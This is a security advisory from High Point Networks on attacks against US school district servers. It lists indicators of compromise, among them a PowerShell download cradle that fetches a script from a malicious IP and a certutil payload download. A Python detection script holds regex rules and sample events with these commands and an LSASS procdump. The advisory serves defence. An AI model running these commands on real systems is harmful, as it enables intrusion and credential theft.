US School District Exploitation Attempts

by | May 2, 2022 | News, Technology

There has been a recent increase in activity targeting school districts across the United States that appears to be staging for ransomware and for numerous crypto-mining campaigns, targeting the critical remote and authentication servers used by students.

 

Related Indicators of Compromise

185.101.107[.]92
powershell iex(New-Object Net.WebClient).DownloadString('hxxp://185.101.107[.]92/lol.ps1')
"certutil.exe -urlcache -split -f hxxp:///checkit2.exe c:/windows/temp/checkit2.exe"

 

Summary of Exploitation Attempts

Detections have shown traffic to 185.101.107[.]92, an IP geolocated in Bucharest, Romania, that is flagged as malicious by 16 vendors on VirusTotal and is reported by AbuseIPDB to be associated with crypto-mining activity. Shodan reports that the IP belongs to an Ubuntu machine with ports 21, 22, and 80 exposed, which suggests it may be a staging point the threat actors use to conceal their actual IP address.

Malicious Java processes have been observed spawning PowerShell and cmd prompts that perform internal enumeration, privilege escalation, credential theft, and external downloads via PowerShell.

The activity starts with a common threat actor tactic known as a download cradle: post-exploitation and exfiltration tools are downloaded and loaded straight into memory, evading detection on disk. We are also seeing malicious use of certutil.exe, a legitimate Windows executable commonly used to display certification authority configuration information and retrieve certificates; these threat actors use it to remotely download a payload rather than a certificate.

In this case, an executable may be stored in the temp folder and could easily be overlooked without proper investigation. Detections for LSASS dumping (credential theft) were also observed; these are typically seen when tools like Mimikatz or ProcDump are executed. Such tools can be abused to steal credentials for exfiltration and password cracking as well as for privilege escalation, bringing the threat actor one step closer to domain admin and to completing their actions on objectives.

In one school district case, discovery found whoami, systeminfo, ipconfig, net user, net local admin, net group "domain computers", and many more reconnaissance commands. In another case, multiple users and a high-privilege service account were identified as having connected to the associated malicious IP.
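As an added detection example (not part of this advisory), the following Python triages process and network telemetry for the behaviours described above: Java spawning a shell, the PowerShell download cradle, certutil used as a downloader, LSASS dumping, reconnaissance commands, and contact with the advisory's IP. The event schema (parent, image, cmdline, dst_ip) and the sample events are assumptions constructed for the example; the certutil host is a placeholder because the advisory does not give one.

```python
import re

# IoC quoted in the advisory (written undefanged so it matches real telemetry).
IOC_IP = "185.101.107.92"

# Command-line patterns for the behaviours the advisory describes. They are
# deliberately narrow; treat hits as leads for an analyst, not as verdicts.
RULES = {
    "download_cradle": re.compile(
        r"(iex|invoke-expression)\s*\(?\s*\(?new-object\s+net\.webclient\)?\s*\.downloadstring", re.I),
    "certutil_download": re.compile(r"certutil(\.exe)?\b.*-urlcache\b.*\b(https?|hxxp)://", re.I),
    "lsass_dump": re.compile(r"procdump.*\blsass\b|mimikatz|sekurlsa", re.I),
    "recon": re.compile(r"\b(whoami|systeminfo|ipconfig|net\s+(user|group|localgroup))\b", re.I),
}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
JAVA = {"java.exe", "javaw.exe"}

def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the names of every rule that fires for one event (hypothetical schema)."""
    hits = []
    if basename(event.get("parent", "")) in JAVA and basename(event.get("image", "")) in SHELLS:
        hits.append("java_spawns_shell")          # Java process spawning PowerShell/cmd
    cmdline = event.get("cmdline", "")
    hits += [name for name, rx in RULES.items() if rx.search(cmdline)]
    if event.get("dst_ip") == IOC_IP:
        hits.append("ioc_ip_contact")             # outbound contact with the advisory IP
    return hits

def triage(events):
    """Index -> hits for every event that fired at least one rule."""
    return {i: classify(e) for i, e in enumerate(events) if classify(e)}

# Constructed sample telemetry mirroring the advisory; not real logs.
SAMPLE_EVENTS = [
    {"parent": r"C:\tomcat\bin\java.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell iex(New-Object Net.WebClient).DownloadString('http://185.101.107.92/lol.ps1')",
     "dst_ip": IOC_IP},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://PLACEHOLDER-HOST/checkit2.exe c:/windows/temp/checkit2.exe"},
    {"parent": r"C:\tomcat\bin\java.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd.exe /c net group "domain computers" /domain'},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\tools\procdump.exe",
     "cmdline": "procdump.exe -ma lsass.exe c:\\windows\\temp\\l.dmp"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Program Files\Google\Chrome\chrome.exe",
     "cmdline": "chrome.exe --type=renderer", "dst_ip": "203.0.113.5"},  # benign control event
]

if __name__ == "__main__":
    for i, hits in triage(SAMPLE_EVENTS).items():
        print(i, hits)
```

Only the benign Chrome event produces no hits; the first event trips three rules at once, which is the kind of stacking worth prioritising over a lone recon hit.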

 

Recommendations

  • Use Geo-IP and block access to/from Romania if not needed in your environment
  • Create access lists to block 185.101.107.92
  • Review Internet traffic for any Indicators of Compromise
High Point Networks